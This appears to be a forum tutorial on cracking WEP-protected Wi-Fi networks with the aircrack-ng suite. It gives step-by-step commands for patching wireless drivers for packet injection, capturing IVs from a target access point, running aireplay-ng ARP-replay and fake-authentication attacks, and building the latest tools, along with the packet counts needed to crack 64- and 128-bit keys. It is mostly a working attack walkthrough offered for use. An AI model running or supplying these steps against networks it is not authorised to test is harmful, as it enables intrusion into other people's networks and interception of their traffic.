1) WHAT YOU NEED
- wireless card
- MAC of the AP (access point)
- MAC of your wireless card
- SSID of the AP
2) COMPILING YOUR KERNEL
- the first thing to do is to compile your kernel and apply the injection patch to the driver
- okay, I've tested this with ipw2200 and rtl8187 driver
- let's get started
2.1) IPW2200 card
- your kernel should look like this:
- then apply the patch:localhost 1.0-dev # cat /usr/src/linux/.config | grep IPW2200
CONFIG_IPW2200=m
localhost 1.0-dev # cat /usr/src/linux/.config | grep IEEE
CONFIG_IEEE80211=m
CONFIG_IEEE80211_DEBUG=y
CONFIG_IEEE80211_CRYPT_WEP=m
CONFIG_IEEE80211_CRYPT_CCMP=m
CONFIG_IEEE80211_CRYPT_TKIP=m
# CONFIG_IEEE80211_SOFTMAC is not set
# IEEE 1394 (FireWire) support
CONFIG_IEEE1394=y
# CONFIG_IEEE1394_VERBOSEDEBUG is not set
CONFIG_IEEE1394_OHCI1394=y
# CONFIG_IEEE1394_VIDEO1394 is not set
# CONFIG_IEEE1394_SBP2 is not set
# CONFIG_IEEE1394_ETH1394_ROM_ENTRY is not set
# CONFIG_IEEE1394_ETH1394 is not set
# CONFIG_IEEE1394_DV1394 is not set
CONFIG_IEEE1394_RAWIO=y
(I'm not going to write about how to download a patch, you can do this on your own)patch /usr/src/linux/drivers/net/wireless/ipw2200.c ipw2200-1.2.1-inject.patch
- your kernel should now look like this:
- the rest should be the same.localhost 1.0-dev # cat /usr/src/linux/.config | grep IPW2200
CONFIG_IPW2200=m
CONFIG_IPW2200_MONITOR=y
CONFIG_IPW2200_RADIOTAP=y
CONFIG_IPW2200_PROMISCUOUS=y
# CONFIG_IPW2200_QOS is not set
CONFIG_IPW2200_DEBUG=y
2.2) the rtl8187 card
- let me just says that 2.6.23-x cards have the support already in the kernel, so I would suggest downloading the latest version of the kernel.
- what you should have in kernel
localhost 1.0-dev # cat /usr/src/linux/.config | grep 818
CONFIG_RTL8187=m
3) SOME BACKGROUND INFO
- all cards can receive and send data in ALL modes, but the communication os half-duplex then (so, it can only do one thing at the moment)
Question: Shouldn't I be in managed mode in order to send packets and in monitor mode in order to receive them?
- well actually you're right, but only for the ipw2200 card
- ipw2200 has a firmware limitation, while you can use rtl8187 in managed+monitor mode simultaneously without any problems."ipw2200" is a great sniffing card but it's injection is limited |-| You need to be on the same channel of the AP you want to attack, and be connected to another AP (obviously also on the same channel and in managed mode)
- you should use rtl8187 for listening and sniffing and ipw2200 for connecting
Question: Why do I only need to patch ipw2200 driver and not rtl8187 one?
- it's because the rtl8187 uses mac80211
- so the rtl8187 isn't patched and it supports monitor mode and injection of packets...thanks to mac80211 and andy greenThe RTL8187 mac80211 driver will be in the mainline kernel from version 2.6.23 on (now it is in 2.6.23-rc1).
The mac80211 framework can be included into older kernel with a patch by Intel and it is included in kernel 2.6.22 and later.
- the ipw2200 uses ieee80211 driver which is not already patched, so you need to patch the ipw2200 driver manually
4) LET's GET TO LISTENING
Code: Select all
airodump-ng -c 11 --bssid 00:18:39:BC:B7:65 -w output --ivs wlan0
- use --bssid to only capture packets from ONLY 1 network
- use -c for channel
- use --ivs to only capture IVs and not other data too
- use -w to write it all to a file
- you need approximately 200-300k packets to crack 64-bit WEP
- and you need 300-1000k to crack 128-bit WEP
Question: I captured 1 million of packets (IVs) with airodum-ng program, but when I open that file with aircrack-ng it only says there are about half of million IVs. Why?
That's because your IVs are duplicating, because you aready captured every IV that was possible and other packets were the same, becuase it was capturing packets the second way around.
5) INJECTING PACKETS
Code: Select all
aireplay-ng -3 -b 00:18:39:BC:B7:65 -h 00:1B:2F:42:FA:FB wlan0
- use -h to specify the MAC of your card
- -3 == the type of attack
Code: Select all
aireplay-ng -1 0 -e eleanor -a 00:18:39:BC:B7:65 -h 00:1B:2F:42:FA:FB wlan0
6) SOFTWARE
- don't use your native aircrack-ng program, because it's not the latest verison and it doesn't have all the options that are needed.
CHANGES IN THE LAST VERSION
1 Version 1.0 (changes from aircrack-ng 0.9) - Released ?? ???? 2007:
2 * airodump-ng: Added --berlin option (see code for more information).
3 * airodump-ng: Fixed 100% cpu utilization while channelhopping on rtap interface
4 * airodump-ng: Fixed frame length < 10bytes bug
5 * airodump-ng: Added out-of-monitor-mode, channel hop and interface down detection
6 * airodump-ng: Fixed debian bug #417388: airodump-ng doesn't restore terminal after error
7 * airodump-ng: Fixed opening the same interface more than once
8 * airodump-ng: Fixed PWR values for some drivers
9 * airodump-ng: Fixed airodump sanity check (resulted in showing WPA networks without CIPHER & AUTH)
10 * airodump-ng: Added "-f" to set the time in ms between hopping channels
11 * airodump-ng: Added partial 40bit WEP detection
12 * airodump-ng: Added "--showack" to print statistics about ack/cts and rts frames
13 * airodump-ng: Added "-h" to hide the known stations in ack statistics
14 * airodump-ng: Added "-r" to read packets from a pcap file
15 * aircrack-ng: Added BSSID merge option
16 * aircrack-ng: Added passive ptw attack (using also IP packets for cracking)
17 * aircrack-ng: Made ptw attack default, for korek attack use -K
18 * aircrack-ng: Fixed huge memory usage with ptw attack on hundreds of APs
19 * aircrack-ng: Added -M paramteter for specifying maximum number of IVs to be read
20 * aircrack-ng: Changed ptw testpackets from first to random (fixes invalidation of found keys)
21 * aircrack-ng: Added --wep-decloak mode
22 * aircrack-ng: Added --ptw-debug to allow klein or ptw disabling
23 * aircrack-ng: PTW: Starts a new process group
24 * aircrack-ng: Increased PTW key checking speed by 20%
25 * aircrack-ng: Try 1000 40bit keys befor starting 104bit cracking, to get the key "instantly" without waiting for 104 bit to fail
26 * aircrack-ng: Fixed not shown ascii keys, when found key was shorter than expected
27 * aircrack-ng: Added visual inspection of the different keybytes (--visual-inspection).
28 * airdecap-ng: Fixed bug in calc_pmk() function causes wrong PMK to be computed
29 * aireplay-ng: Added usage of RTS/CTS, auth and ACK to --test (more stable and faster)
30 * aireplay-ng: Added TCP connection test to --test
31 * aireplay-ng: Changed injection rate to be more stable
32 * aireplay-ng: Made essid argument optional - sniffs the essid if its broadcasted
33 * aireplay-ng: Made src mac argument (-h) optional - uses default interface mac
34 * aireplay-ng: Added bitrate test to --test (-B)
35 * aireplay-ng: Fixed 100% cpu utilization in --test
36 * aireplay-ng: Added --fast switch to use first available packet without interaction
37 * aireplay-ng: chopchop now tries header recreation workaround if icv check failed
38 * aireplay-ng: Fixed seq field for fragment attack
39 * aireplay-ng: Now works with rtc_cmos
40 * aireplay-ng: Added automatic channel changing in --test to AP channel
41 * aireplay-ng: Added channel synchonisation for --test between cards
42 * aireplay-ng: Added possibility to limit injection test to one AP "-a" or "-e"
43 * aireplay-ng: Added BSSID/ESSID detection, so it can be enough to specify one option
44 * airmon-ng: Added driver detection through sysfs
45 * airmon-ng: Added mac80211 support
46 * airmon-ng: Added networkmanager detection - airmon-ng check
47 * airmon-ng: Fixed interface name detection
48 * airmon-ng: Fixed Ralink rt73 detection
49 * airmon-ng: Using real interface name instead of first 7 bytes
50 * makeivs-ng: Added parameters to set length, number and first IV of generated IVs
51 * makeivs-ng: Added possibility to generate IVs sequentially or randomly
52 * makeivs-ng: Added parameters to set percentage of false and dupe frames
53 * makeivs-ng: Added 256bit wep support
54 * packetforge-ng: Added support for generating more than on packet
55 * patches: updated rtl8187 patch for 2.6.22
56 * patches: updated zd1211rw patch for 2.6.22
57 * New IVS format for storing all relevant data
58 * Auto-creation of rtap interface if it doesn't exist (ipw2200)
59 * Better acx, rtl8180, orinoco and madwifi-ng detection
60 * Using OpenSSL instead of build-in crypto
61 * Added library rx/tx support
62 * Added airpcap rx/tx support
63 * Added airdriver-ng script for installing and managing patched drivers
64 * Added wesside-ng as an all in one tool for recovering the wep-key
65 * Added easside-ng for realtime decryption (instant rx/tx) of wep frames
66 * Added buddy-ng as loopback server for easside-ng
67 * Added airserv-ng - server for rx/tx on another system
68 * Added airolib-ng for using hash tables to crack wpa/wpa2 psk (supports cowpatty rainbow tables)
69 * Fixed compilation of optimized binaries with icc
70 * Fixed compilation on FreeBSD, NetBSD, OpenBSD and MacOSX
71 * Better WDS handling and display
72 * Added detection and removal of trailing fcs checksum
73 * Fixed several memory leaks
74 * Fixed being root when connecting to airserv-ng
75 * Added OpenBSD sniffing support
- to get the latest version do this:
- The goal of the Subversion project is to build a version control system that is a compelling replacement for CVS in the open source community.emerge subversion
svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd into the directory you just downloaded
use the tools like this: ./src/.arieplay-ng ...
7) TESTING
- test your driver if it supports injecting (with this test you can also see if you compiled your driver correctly)
Code: Select all
localhost 1.0-dev # ./src/aireplay-ng -9 wlan0